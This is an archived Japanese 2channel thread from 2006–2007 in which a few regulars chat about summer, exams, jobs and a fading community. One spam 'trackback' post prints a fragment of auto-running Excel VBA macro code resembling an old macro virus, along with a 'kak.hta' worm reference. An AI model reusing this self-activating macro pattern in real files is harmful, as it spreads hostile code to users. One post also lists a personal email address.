2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【夏の夜】勝負ね!負けた方は・・・【線香花火】

1 :代行:2006/06/30(金) 00:01:16 ID:sznUIFJt ?#
良コテからの大切なお願い
http://ex15.2ch.net/test/read.cgi/news4vip/1151593141/

1 :( 'ー`)なっしゃん ◆SEGAJhVOSA :2006/06/29(木) 23:59:01.11 ID:JanCf23q0
誰かスレ立てて

930 春 ◆orcESIqFoA 2006/06/29(木) 23:45:42 ID:4qcAW1A7
>なっしゃん
あたしも一番これがいいなと思いました♪

それじゃ、次スレはこれで!
【夏の夜】勝負ね!負けた方は・・・【線香花火】

で、スレ建て挑戦しましたが、無理でした↓どなたかよろしくお願いしますo(><)o

http://etc3.2ch.net/bobby/

2 :おいら名無しさんヽ(´ー`)ノ:2006/06/30(金) 00:13:42 ID:???


3 : :2006/06/30(金) 00:13:50 ID:KaIgCzxs
ここに来てみたらトリップが違うわ

4 :◆orcESIqFoA :2006/06/30(金) 00:39:39 ID:DiTSOQf8
1さん乙です!
引き続きマターリよろしくお願いします。

5 :天使さん ◆7B0cCOOL7U :2006/06/30(金) 01:18:56 ID:1uV30o45
新スレオメ!

6 :アゲハ ◆Venus..0bQ :2006/06/30(金) 09:12:35 ID:???
新スレおめぇぇぇ!!
(人*”∀”*)



7 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/06/30(金) 11:44:40 ID:Y5WL8I8g
新スレおめ!

ぬぬっ、いきなりオレの偽者か!

8 :ъ( ^ー^) <キラキラ☆ ◆XGdggPFE4A :2006/07/08(土) 20:14:12 ID:kRYW1Y/5
新スレおめ!

いろいろと忙しくて最近2ちゃんができないけど
応援してるよ。

9 :冒険野郎マードック ◇SET/ZPJMjY :2006/07/08(土) 21:23:24 ID:???
|  代行をお迎えに上がりました
\__  _________
     V
              凸\_________/,凸、
           ノ´⌒`ヽ三三三三三三三i三.ノ´⌒`ヽ、
         [二ノ´金`ヽ二]二二二二二二i仁ノ´劵`ヽニフ
           ,.-┴―┬┴┐鬨鬩鬨鬩鬨鬨鬩鬨
            /ΛΛ //ΛΛ||L匳匳||卅||匳匯||匳||
        /_(゚д゚_//_゚Д゚,,)| |丗卅丗卅丗卅丗卅丗
  _,,,.-―''''"_,,,.-―''''"|コ ̄ ∪i  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄|
 i゛(}[王i王]I()0コ ―― |―――=|――――――――――〕
 |_∈口∋ ̄_l_l⌒l ノ       ノ      ___l⌒l_ソ
   ̄ ̄`ー' ̄ `ー' ̄ ̄ ̄ ̄  ̄ ̄ ̄ ̄`ー'   `ー'


10 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/07/14(金) 11:49:36 ID:TclEqLy5
色々やってて全然家にいなかったぜ
てか新スレ誰もいねぇ(;´□`)

11 :トラックバック ★:2006/07/14(金) 14:02:19 ID:???
【トラックバック来たよ】 (ver. 0.11)
[タイトル]
[発ブログ] 天国@2ch掲示板
http://ex13.2ch.net/test/read.cgi/heaven4vip/1152852996/l50
[=要約=]
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???



12 :アゲハ ◆Blue.w/17s :2006/07/18(火) 22:17:49 ID:WvEx9YIE
みんな・・・

何処へいったの・・・?
(´;ω;`)


13 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/07/19(水) 03:41:20 ID:86oUOEad
ボクはここにいるよ!!

14 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/07/21(金) 13:10:26 ID:4Gu/Itwg
あんらーホントにみんないないのねん

15 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/07/27(木) 02:33:56 ID:KsdSQ1G+
うーん、みんなリアルにいないのね(;´□`)

16 :アゲハ ◆Blue.w/17s :2006/07/27(木) 23:09:47 ID:???

此処にいるよ!!


壁|∀・)<いつでもいるよ!すぐそばに!!


17 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/07/28(金) 03:48:46 ID:HZxCOwEP
キャーアゲハたーんヽ(´▽`)ノ
そっちも梅雨明けたかい?
オレは物凄い勢いで降り注いでくる紫外線で早くもやけたぜ!

18 :アゲハ ◆Blue.w/17s :2006/07/28(金) 07:43:37 ID:???
キャーなっしゃーん
ヽ(´▽`)ノ

梅雨明け・・・ま、まだしてねッスw
あたしなんて、もともと色黒いから、毎日雨続きでも着実に黒さが増しているw
いまさら、日焼け止めクリームなんて意味ねーよぉうw(;´Д`)アゥアゥ


19 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/07/28(金) 12:51:41 ID:HZxCOwEP
うおっ!そう遠くない距離なのにそっちはまだなのか!
雨なのに焼けるって梅雨去ったらアウチだねw
ガングロギャルになちゃうょヽ(´ー`)ノ
そういえば2年ほど前の夏に通学ついでに焼こうと思って毎日タンクトップで原付乗ってて
黒々焼けたんだけど、気がついたら両腕(BCG注射打つ辺りw)に変なボツボツできまくり!
未だに消えねぇよこの痕・゚・(ノД`)・゚・漏れの身体傷物に・・・

20 :◆orcESIqFoA :2006/07/31(月) 00:00:32 ID:eSsoMo0y
_・)

21 :◆orcESIqFoA :2006/07/31(月) 00:04:59 ID:zWxWg3dY
_・)<テスト明けるまでは来ないって自分で決めてたのですが…無理でした

22 :◆orcESIqFoA :2006/07/31(月) 00:05:50 ID:zWxWg3dY
_・)<明日でテストは終わりです。なんだかスレ放置になってしまい申し訳ありませんでした

23 :◆orcESIqFoA :2006/07/31(月) 00:07:09 ID:zWxWg3dY
_・)<でわ、勉強に戻ります。おやすみなさい

24 :◆orcESIqFoA :2006/07/31(月) 00:08:25 ID:???


25 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/07/31(月) 01:39:13 ID:12nAHPwm
春たーんヽ(´▽`)ノひっさしぶりーっ☆
オレは明日からテストだ!
まだ勉強してねぇけどw
まぁそんなの関係無しにオレはちゃんやるけどね( ̄ー ̄)


そういえば祭りに行ったのにりんご飴がなくて
仕方ないから自分で作ったお
初めて作ったけど簡単でウマー
りんごが高かったのが痛かったけど美味かったから問題ねぇ!
ついでにべっこう飴も作って冷蔵庫で冷やし中
明日気づいたら誰かに食われてるんだろうけどキニシナイ(´ε`*)

26 :アゲハ ◆Blue.w/17s :2006/07/31(月) 07:38:42 ID:6ZZA6MgH
春たんだーーー!
ヽ(´ー`)ノ

春たん夏休みはないの?
今度の休みに、春たんトコに遊びに行こうかなぁ〜♪
(*´∀`人
チビも一緒に♪

>なっしゃん
飴かぁ〜♪
オフ会の時に食べた、杏飴思い出すわぁ〜♪
味が、梅干しっ!?みたいでビックリだったけどねw(´ー`)ゞ


27 :アゲハ ◆Blue.w/17s :2006/07/31(月) 07:40:18 ID:???
春たん、なっしゃんも、良かったら遊びにきてね♪

顔集うスレ【なんで…なんでなんだ!】
http://sports2.2ch.net/test/read.cgi/entrance2/1154181073/


28 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/07/31(月) 12:37:26 ID:12nAHPwm
飴は古きよき時代の文化の極みだよヽ(´ー`)ノ
てかアゲハたん最近いないと思ったらクラウンに進出してたのか!
オレもその昔あそこに住み着いていたようないなかったような


とりあえず今日からテストラッシュだぜー
丁度金がないからパチ屋に行かなくても済みそうだし
ちょっとぐれぇ勉強してやっかな!

29 :◆orcESIqFoA :2006/08/03(木) 08:47:26 ID:dLcJVjZo
おはようございますっ。

なんかこのままだと放置みたいになるので、断っておきます。

あたし、今いろいろとやりたいこと・やってみたいことができてしまい、なかなか此処にくることができません(´д`)


なので、少し旅に出ます。笑
このスレにはいずれ戻ります。
ただ少し来れなくなります。よろしくお願いします。




(時々、保守しには来るかもです(・∀・)

30 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/08/04(金) 03:27:50 ID:guVAHSN/
やりたいことがあるってのは素晴らしいことだよ春たん(・∀・)
気にしないでゆっくり旅をしてきたらいいさ!
オレはいつまでもここにいるさぁ(´ε`*)
帰ってきたら旅の土産話でも聞かせてくんろ(´ー` )

31 :ъ( ^ー^) <キラキラ☆ ◆XGdggPFE4A :2006/08/05(土) 20:08:03 ID:Tpn1flgn
1ヶ月ぶりくらいの書き込み。

春たんは充実した毎日を送ってそうだねー

32 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/08/06(日) 21:34:02 ID:C3Jun5dm
キラたんおひさ!
仕事激しく忙しいんだね?

33 :ъ( ^ー^) <キラキラ☆ ◆XGdggPFE4A :2006/08/11(金) 10:51:19 ID:XRHoIF9E
なっしゃんおひさ!
仕事じゃなくて、プライベートが忙しいっす・・・

また、いつかなっしゃんと語りあいてーよー。

34 :なっしゃん@携帯 ◆SEGApSaId. :2006/08/12(土) 14:39:27 ID:IyiF3DZB
キラたんに彼女の予感!?
次はその件について小一時間問い詰めさせてもらうよ( ̄― ̄)

35 :おいら名無しさんヽ(´ー`)ノ:2006/08/12(土) 20:03:26 ID:???
おげんこ?

36 :◆orcESIqFoA :2006/08/13(日) 01:19:57 ID:???
。゜(´□`)゜。

37 :なっしゃん@携帯 ◆SEGApSaId. :2006/08/13(日) 15:20:36 ID:QYzQiVJD
>セガの中の人
すっげーご無沙汰!
オレぁ相変わらず元気してるぜ!
そっちはまだここで活動してるのかい?

>春たん
ど、ど、ど、童貞ちゃうわ!(春たん元ネタ知らないだろうなぁ…
何かあったのかい春たん!?

38 :◆orcESIqFoA :2006/08/13(日) 23:29:38 ID:OBUoJple
>>37
元ネタなんてあったですか?!知りませんでしたΣ(・д・`)

あ、これはなんとゆうか、寂しさを顔文字に表現させてみたと言いますか…そんなとこです(*´-`*)

39 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/08/13(日) 23:59:40 ID:zXJHfGGR
寂しいならオレの胸に飛び込んでこいっヽ(´▽`)ノ大きな温もりで包み込むぜ

40 :◆orcESIqFoA :2006/08/14(月) 00:07:26 ID:hn3JxOfV
/´д`)/  ヽ(´∇`)ノ
なっしゃーん



41 :◆orcESIqFoA :2006/08/14(月) 00:20:09 ID:hn3JxOfV
はっΣ(・д・`)!明日は朝からバイトなのでした!
寝なくてはっ!

おやすみなさーい☆

42 :ゆい:2006/08/14(月) 00:25:54 ID:xd3A8mGK
あなはやま

43 :おいら名無しさんヽ(´ー`)ノ:2006/08/14(月) 00:38:49 ID:???
>>37
俺はなんとか元気かなw
メイン遊び場の薬板がやたらとつまらなくなってきてるんで足は遠退き気味
だけどやっぱ2ちゃんはやめられねぇ。

てか覚えててくれてありがと。忘れられてるかもっておもてたからw

44 :おいら名無しさんヽ(´ー`)ノ:2006/08/14(月) 00:47:52 ID:???
あ、ワタクシこーゆーものでした。

45 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/08/14(月) 01:37:43 ID:ahPn3Kr2
>春たん
しまった!まさかこんなに早くレスが帰ってくるとは思ってなかったからオカルトHP見てたぜ!
春たんとリアルタイムトークするチャンスを逃してしまった・゚・(ノД`)・゚・
いい夢みろよ☆

>セガ人たそ
そのメル欄、16年は忘れないぜ!(年数はテキトー
オレも最近あんましやってないけど辞めてもいない感じ!
昔遊んでた人があんまりいなくなってしまったってのもあるけど
オレが無駄に外出してるのが原因だな!ほとんど家にいないぜ!
まぁ暇だったらレスでもしてくれぃ!
昔いたスレはもう全く見てないからそっちには行かないけど
ここに書いてくれたらすぐ気づくから(・∀・)

46 :◆orcESIqFoA :2006/08/14(月) 09:24:45 ID:hn3JxOfV
おはようございまーす

お盆は暇人な私です(´・ω・`)

東京で停電があったみたいですね。

47 :◆orcESIqFoA :2006/08/14(月) 09:26:30 ID:hn3JxOfV
セガ人さん初ですノシ

良かったらいつでもいらして下さいね(*´-`*)

48 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/08/14(月) 14:16:04 ID:ahPn3Kr2
墓参り行ってきますた(´ε`*)



東京大停電だったらしいね!80万世帯が停電だっけ?
しかも原因が江戸川の送電線に何かがひっかかったからとか
たった一本の送電線でそこまでの被害が出るとは・・・テロリストにいいネタ提供しちゃったじゃん!!

49 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/08/14(月) 14:19:43 ID:ahPn3Kr2
そういえば昨日バイト思いっきり遅刻したんだけど
まぁ反省なんてこれっぽっちもしてませんがね( ̄ー ̄)
んでその原因が暑さで起きてみたら携帯の電源落ちてたのよ
んで起動してみたら余裕で2時間以上寝坊してたのね
まぁそこはオレ、優雅に朝食と朝のシャワーを堪能してからバイトに向かいましたがね
とりあえずなんだ、オレの携帯もうだめぽ
新しいのに替えたいけどウィルコムの結構高めなんだよね機種変
新規6000円なのに機種変20000円とかだよ?頭おかしいんとちゃうかと
こりゃサイフと相談・・・・400円もなかったorz

50 :◆orcESIqFoA :2006/08/15(火) 10:13:13 ID:pamLUuaf
あたしの携帯もだめだめです(ノд`)
そして、あたしもお金がないので機種変できないのです↓

泣きたい


駒大と青森山田の試合すごい(`・ω・´)

51 :◆orcESIqFoA :2006/08/15(火) 10:51:36 ID:pamLUuaf
ヤバイ、感動したあ
。゜(´□`)゜。


甲子園すてきです

52 :なっしゃん@携帯 ◆SEGApSaId. :2006/08/15(火) 16:17:08 ID:ovwaliNw
甲子園アツいみたいだね!
まだ1試合も見てない訳ですが
新聞で結果見るだけだぁ(´ε`*)
野球といえばメジャーっていうアニメが面白くてしょうがない
夜中にNHKで再放送みて泣きまくったぜ

53 :◆orcESIqFoA :2006/08/15(火) 19:17:05 ID:pamLUuaf
>なっしゃん
メジャー見たときある〜(○>艸<)アレはおもしろいです!

今、夏ですよね…そ、それなのに!東北はなかなか寒いです(´・ω・`)

54 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/08/15(火) 22:56:50 ID:yIOSwEri
メジャーいいよなーコテコテのスポ根だけど!

てか東北寒いんだ(;´□`)羨ましかぁ
オレは熱くてバテバテだよ

55 :◆orcESIqFoA :2006/08/15(火) 23:02:21 ID:pamLUuaf
そーいえば去年の夏も同じようなことを話した記憶があります(*´-`*)

2ちゃん始めてもう1年経ったんだあ。

56 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/08/16(水) 00:30:46 ID:gEAhSf7W
オレも同じ話した記憶があるお
春たんとの関係ももう1年かぁ(´ー` )早いもんだねぇ
最近色々としんみりと考えることが増えたよ
だって肉体が衰え過ぎてて疲れ取れないわ肩こるわ動くとすぐ疲れるわで
完全におじいちゃん状態なんだもんよ
既に肉体は年金生活だよー

57 :ъ( ^ー^) <キラキラ☆ ◆XGdggPFE4A :2006/08/18(金) 20:01:19 ID:5wCqhg2t
1年が立って、春たんも大人の女になったね!

58 :アゲハ ◆Blue.w/17s :2006/08/18(金) 23:53:55 ID:WQFuVyFV
みなさんおひさですっ!!ヽ(´ー`)ノ

ずーーーっと!ご無沙汰のアゲハですw

最近やたらと飲んだくれてますw

飲んではみんなを思い出している日々・・・(;´Д`)
元気でいる、それだけが聞ければ何も言うことない。。。
離れていたって・・・

僕達は友達だっ!!

以上
酔っ払いアゲハの独り言でした〜♪

ノシ


59 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/08/19(土) 03:08:10 ID:ruLW9GsK
>キラたん
春たん大人バージョンかぁ・・・・ハァハァハァハァ


>アゲハたん
元気ダイナマイトだよ!
肉体はアベシッだけどね!心はいつまでも中学生さ!!
ユーはミーのフレンド!!

60 :◆orcESIqFoA :2006/08/19(土) 21:40:03 ID:MjknKXFN
>なっしゃん
なんだか懐かしいですよね(*´-`*)

>キラたん
大人の女性になれたら嬉しいんですが(´д`)

>アゲハたん
お元気そうで何よりです(´∇`)
ずーっとトモダチです♪

61 :◆orcESIqFoA :2006/08/22(火) 01:26:15 ID:EDHZ8pKo
甲子園が終わると夏の終わりがぐんと近付いた感があります

62 :なっしゃん@携帯 ◆SEGApSaId. :2006/08/22(火) 16:18:13 ID:KtEED0un
早く涼しくなって欲しいよ
アツいのは甲子園だけで十分だyo!!

63 :◆orcESIqFoA :2006/08/23(水) 18:34:23 ID:0/PzoXIc
>なっしゃん
暑いのは嫌なんですけど、夏が終わるのはなんだか寂しいです(´・ω・`)


そういえば、今回の24時間テレビのマラソンはアンガールズなんですよね、
あの二人完走出来るのかな(´д`)?

64 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/08/23(水) 23:32:53 ID:Kf24f0ei
今年の夏は唯一の予定だった旅行が無くなって
マジに無予定・゚・(ノД`)・゚・
一体何をして過ごせばいいんだYO!!
バイト以外まだ何もしてないYO!!


うちの店も24時間テレビ支援してるらしくて
24時間テレビ缶バッチとか支給されたけど
全然内容知らねw
アンガールズが走るならナンデ??って感じのキャスティングだね

65 :◆orcESIqFoA :2006/08/25(金) 02:07:04 ID:lHzM+M6Q
今日の夜空は星が見えますね(*´-`*)

最近、くもりばかりだったのでなんだか嬉しいです。


>なっしゃん
私も今は予定がさっぱりなくて(pω・`。)
でも、9月に葡萄狩りに行くので、バイトに励みたいと思います(´∇`)

66 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/08/26(土) 05:36:43 ID:hxtEnG/y
ぶどう狩りヽ(´▽`)ノついでにオレも狩って!


何気に2日連続徹夜してしまった
しかも両方麻雀で・・・もうどうしょうもないぐらい駄目な子w

67 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/08/26(土) 17:04:16 ID:hxtEnG/y
12時に起きる予定が気づいたらこんな時間に・・・タイムショック!!

68 :◆orcESIqFoA :2006/08/31(木) 22:27:20 ID:nj3OlunO
最近来てないからかボビーが変わった感じがしますね(´・ω・`)

69 :◆orcESIqFoA :2006/08/31(木) 22:45:43 ID:nj3OlunO
はっΣ(・д・`)!
このスレタイ、このままでは大分季節はずれになる予感が・・・ww

70 :◆orcESIqFoA :2006/08/31(木) 22:50:35 ID:nj3OlunO
(`・ω・´)にゃ〜w

71 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/09/04(月) 00:51:29 ID:hoAQloYB
最近知り合いが全然いないから更新されてるかチェックするだけでほとんど活動してないぽ
今はオカルト板かギャンブル系のとこしか活動してない気が。。。

72 :はる ◆orcESIqFoA :2006/09/10(日) 23:59:32 ID:OykGZeCI
>なっしゃん
わたしもずばりそれです(´д`)
しかも更新確認の頻度もまちまちなので、リアルタイムでは難しいんですよね;

73 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/09/11(月) 11:52:03 ID:5Qnj/SL9
しっかしアレかな、みんな忙しいのかな
オレはバイトと副業ばっかで忙しいっちゃ忙しいけど一日に何回か更新確認してるからねぇ
寂しいわぁ(;´□`)

74 :◆orcESIqFoA :2006/09/12(火) 11:55:17 ID:06QZ3PW5
私もいそがしいのはバイトで結局は夏休みですし、数日に一回は見ているのですが(´д`)


社会人は忙しそうですねσ(・・;)

75 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/09/17(日) 17:11:49 ID:cbb/dlvW
バイト7連荘マジファッキン
やっと終わったけどもう夏休み終わりだし・・・
夏休み最終日は教習所で過ごすか・・・

76 :はる ◆orcESIqFoA :2006/09/28(木) 21:48:11 ID:5UbqEDQH
たぶんもう、むかしにはもどれない

77 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/09/29(金) 04:37:44 ID:uod2q37h
春たーんヽ(´▽`)ノおひさーっ!
そしてなんかシュール!!

78 :はる ◆orcESIqFoA :2006/09/29(金) 10:10:36 ID:wCBYS3vZ
>>77
お久しぶりです。
1年前、『暇な青春』のスレにレスつけたのがはじめでしたね。
いろんな人と出会って、いろんなことを話して、1年たってもずっとこのままだと思っていました。
そろそろもう…というかずっと潮時だったのかもしれませんね(pω・`。)

79 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/09/29(金) 14:15:53 ID:uod2q37h
潮時かぁ・゚・(ノД`)・゚・切ない言葉じゃぁ
最近みんな忙しいみたいでレスないけど
このままま〜〜〜ったりと継続してもいいんじゃないかな?
おいらロビーって元々そういうところだし
人がいないのが普通みたいなw

80 :ъ( ^ー^) <キラキラ☆ ◆XGdggPFE4A :2006/09/29(金) 18:48:52 ID:+Qo3LC1l
おおおおー、春たんほったらかしにしてごめんよー
最近、プライベートで忙しくなってしまって・・・

81 :ъ( ^ー^) <キラキラ☆ ◆XGdggPFE4A :2006/09/29(金) 18:50:33 ID:+Qo3LC1l
いやー、見てはいたんだけど、そんなに長い時間
2ちゃんできないもんで・・・

春たんは最近どうなのよ?
彼氏とか彼氏とか彼氏とかさ、どうなってるんよ!?

82 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/09/30(土) 04:33:44 ID:dgF33GID
↑のレスについてkwsk

83 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/11/21(火) 23:36:06 ID:lTlX41so
うをぉぉぉっぉぉマジでもう誰もいねぇぇぇじゃあああああ

84 :蝶羽 ◆Blue.w/17s :2006/12/05(火) 21:22:40 ID:sLEEq/rv
なっしゃん?

誰かいる・・・?
春たん・・・?

みんないなくなっちゃった・・・

ずっと来れなくてごめんね・・・
。゚(PД`)q゚。


85 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/12/05(火) 23:02:04 ID:gcc26MVG
アゲハたん漢字ver!?
オレはいるよ・゚・(ノД`)・゚・みんなはいないけど

86 :カフカ ◆o88Rd9itqI :2006/12/07(木) 17:33:37 ID:???
ん?
 

87 :蝶羽 ◆Blue.w/17s :2006/12/08(金) 21:55:32 ID:Az6Ux3hd
>>なっしゃん
そっか・・・
春たん、何かあったのかな・・・?
キラたんもいないね。。。なっしゃん、アタシね、仕事変わったんだ
またね、トラック乗りになったんだ (´ー`)ゞ
今度こそ、トラックでみんなのところに行くよ♪

>>春たんへ
明日、仕事で仙台に行きます。
春たん、、、元気なの?
泣いてない?
また、温泉に行きたいね…。゚(PД`)q゚。


88 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/12/09(土) 03:56:18 ID:GWVJ9bLR
トラック姉さんに戻ったんだねヽ(´▽`)ノカックイィ!!
デコトラが似合いそうww
春たんはきっといい人見つかって熱愛街道一直線なんだよ!
キラたんは単純に仕事がハード過ぎる気がする!
オレ最近、麻雀以外楽しみがないぐらいダークな暮らししてるよ(;´□`)

89 :おいら名無しさんヽ(´ー`)ノ:2006/12/09(土) 11:34:14 ID:???

               -──-、, '´ ̄`ヽ
           /     , -‐===‐- 、/____
.         , -‐‐、  ´ / /.:.:.:/'´ ̄ ̄` ` 、 、      . -──- 、
         / くノ ノY7'/ , '´ ̄` ‐,‐‐-,-、__   ヽ \  /   -‐‐   〉
        ヘ.  `'く {/ {  .〃 /{ /{{ ハ `ー-、ハ  V  /      ノ
        ト、 \_  )  〉 {{ {_ム=、{ V==、_-、__} }  i} /´ ̄ , -‐‐'
        i  / ̄`7i 〃 / V " 、  "   `Y)ノム、/ /    / __, -──-、
  -─- 、  ト、./   厶i {{ /;;;;;{   iァ‐、     ,' /´ノノ    //. :.: / /_ ヽ
 i ヽ.:.:.:.:.::\j∨   厶⊥」V ;;;;;∧   、_ノ  / ,イ-イi{    /.: .: / ̄ ̄ ヽヽ ノ
 i . :. :ヽ/.:.:.:.::〉   ,'o∞o  ` く;;;∧ ` ー='´ /∧ヽ ヽ\__/  i/ ̄  , -‐‐…’
  、 :.:.:.:.:\ :/    ムニ=-‐゚o .:.:. 〈 ノ`rー‐‐< ∧ ヽ \\/ ̄7.:.:.:.:. / n
  ゝ .:.:.:.:.:.〉    /     ゚o.:.:.::}`i¬ー-∞0oL,≧=-、 `,ー ̄/.:.:.:./  / .}   ,-,‐,
  ヽ. :.:.:.:..{   /      §.: ;゚ / __   ゚o ゚∞゚。o゚。o ヾ´ ̄ ̄`く   ,'´ ,ニ<// /
    ヽ. .:.: 、 ___,,,.. 、-ー==T゚ Y/ ifinji  ヽ     `・、 }(__).:.::。゚   ,゚。     _二ニ '
-─、─-\ .:.:.:.::.:.:.:.:.:.\/.:. ├ '{   `ー'   }      firv゚ _。o ゚  。'  ゚7´ ̄
   \  \.:.:.:.:.::.:.:.::.:.:ヽ.:;;;i  `       ノ        ヾ爪 /    / ゚ o/
        了.:.:..:.:.:.:‐-;;ヽ ヘ   ー-‐ ´   、   メ V_____/  / ◆
   , ´ ̄`⌒⌒ヽ.:..:.:::;:;:;:;:;;;;;;xヘ      ___   ` 爪   マ/     '
 , '⌒ヽ       i \..:.: .:.:;;;;;;;;;;;)    ´  `  /~~ヘ   `   /\

90 :おいら名無しさんヽ(´ー`)ノ:2006/12/09(土) 19:45:49 ID:???
マジでごめんな・・・・・・
って言ったら誰か分かるなw
まぁ憶えてるか分からんけど。
カイ←これでどうだ!って今更出てきても
何も出来ないけど^^;
名前出したらまたごちゃごちゃうるさいから伏せる。


91 :おいら名無しさんヽ(´ー`)ノ:2006/12/09(土) 19:52:55 ID:???
korosiamudayo2000@yahoo.co.jp
何となく載せとく。
キャップと黒ぽんは元気だぞーーーーーーー
俺は元気じゃないぞーーーーーーー
今更なんだこいつって感じだよな^^;

92 :蝶羽 ◆Blue.w/17s :2006/12/09(土) 21:44:22 ID:E81e5xkM
>>88
ありがとう♪(*´∀`人
結局のところ、トラックが大好きだから、運転手しかできないアタシw
デコトラかぁ〜(*´‐`人
乗りたいなぁ♪♪♪

春たんもキラたんも、、、元気ならいいんだ
みんなが元気なら心配しないw
なっしゃんも麻雀ばっかりしちゃだめだぞっ!!
(*´∇`*)o

>>90
わかってるよ
多分そうだと思ってた
別に謝らなくてもィィんだよ (´ー`)ゞ
何も悪いことしてないじゃん
とりあえず・・・
元気そうでよかったよ♪
仕事、頑張ってるの?


93 :おいら名無しさんヽ(´ー`)ノ:2006/12/09(土) 22:33:52 ID:???
>>92
あ〜〜・・・だなw
とりあえず最近はあんま元気じゃ無いかな。
仕事は転々としてた。スーパーの仕事やってただろ?
あれは八月に辞めて、親父の現場仕事を手伝って(タイル工事)
それも最近辞めて、今は工場のバイトをやってるで。
いや〜何か色々あったなwその中でも死にそうになった事が
多かったw頭から出血するわ、骨は折れるわ、
良い事なんて一つも無かったなw
一番酷かったんが、高い場所(10M)から落ちそうになった事w
いや〜あれは危なかったわ

94 :蝶羽 ◆Blue.w/17s :2006/12/10(日) 21:11:03 ID:RHodGvRt
>>93
ただ、一つ聞きたいことがあるの。
何故、、、
いきなり連絡がとれなくなったの?


なーんてね(;´ー`)ゞ
こんな話はここでしちゃいけないねw
気が向いたら、メルでもちょうだいな♪


95 :ъ( ^ー^) <キラキラ☆ ◆XGdggPFE4A :2006/12/12(火) 20:44:07 ID:nLKwJv2U
仕事は忙しくないんす。
実は数ヶ月前に彼女ができて、それで忙しいんよ。

見てはいたんですよ見ては。

96 :( 'ー`)なっしゃん ◆SEGApSaId. :2006/12/14(木) 14:10:09 ID:mV3hCeFq
この幸せ者ヽ(´▽`)ノ

97 :( 'ー`)なっしゃん ◆SEGApSaId. :2007/01/03(水) 00:16:01 ID:mtNAQjq6
あけましておめでとうございますヽ(´▽`)ノ

98 :はる ◆orcESIqFoA :2007/01/11(木) 18:22:16 ID:kcET1xQU
ω・`)





あけましておめでとうございますなのです(´・ω・)



99 :◆orcESIqFoA :2007/01/11(木) 18:31:15 ID:kcET1xQU
ほんとに、あの、ごめんなさい(pω・`。)


ちょっといろいろあって…


なんか今見ると八つ当たりみたいですね。


みなさんはなんの関係もないのに。


ほんとにごめんなさいでした。




100 :えなりピンコ ◆jVjZKwVUR2 :2007/01/12(金) 05:32:52 ID:YLU+R+pZ
失恋はダメージがデカイな・・・


101 :◆orcESIqFoA :2007/01/12(金) 23:32:12 ID:Nw9VwhpR
失恋ですか。ん〜つらいですよね(´〜`)

えなりピンコさん失恋されたんですか?

102 :( 'ー`)なっしゃん ◆SEGApSaId. :2007/01/13(土) 02:01:43 ID:0O6IUVfq
は、は、は、はるたーん・゚・(ノД`)・゚・おかえりなさーい!

103 :えなりピンコ ◆jVjZKwVUR2 :2007/01/13(土) 02:42:55 ID:NV/XMCrC
ま、まーね・・・
遠距離恋愛ってやつっすw
付き合って二ヶ月だったんだけど、いきなりメールで
「別れよう」って言う一言メールが来てなw
電話かけても、繋がらない。

104 :◆orcESIqFoA :2007/01/13(土) 14:20:43 ID:G87BY0sa
>なっしゃん
ただいまです(*´-`*)
ご迷惑おかけしました;

105 :譏・ ◆orcESIqFoA :2007/01/13(土) 14:25:10 ID:G87BY0sa
>縺医↑繧翫ヴ繝ウ繧ウ縺輔s
縺医∴縺縺ホ」(ス・ミエス・ス)
縺縺阪↑繧翫√◎繧薙↑縺」縺ヲ諢溘§縺ァ縺吶ュシ
莨壹>縺ォ縺ィ縺九ッ陦後°繧後↑縺縺ョ縺ァ縺吶°シ
逅逕ア繧ら衍繧峨★縺ォ蛻・繧後r蜻翫£繧峨l繧九↑繧薙※縲√▽繧峨>縺ァ縺吶h縺ュ窶ヲ

106 :◆orcESIqFoA :2007/01/13(土) 14:27:32 ID:G87BY0sa
あわわわ…文字化けですΣ(・д・`)


107 :( 'ー`)なっしゃん ◆SEGApSaId. :2007/01/13(土) 20:32:15 ID:0O6IUVfq
文字化けMAX!!

108 :蝶羽 ◆Blue.w/17s :2007/01/13(土) 21:24:31 ID:oMkpp490
はぁるぅたぁぁぁんwww
ヽ(Ο´3`)´3`)ノ

おかえりなさいっ!&
あけおめっ!!!
みなさん挨拶おくれてごめんなさいです。。。
仕事のせいにしたくないけど、超忙しくってwww
(Θ_Θ;)


109 :◆orcESIqFoA :2007/01/13(土) 21:47:56 ID:G87BY0sa
>えなりピンコさん
ええぇぇΣ(・д・`)
いきなり、そんなって感じですね;
会いにとかは行かれないのですか?
理由も知らずに別れを告げられるなんて、つらいですよね…


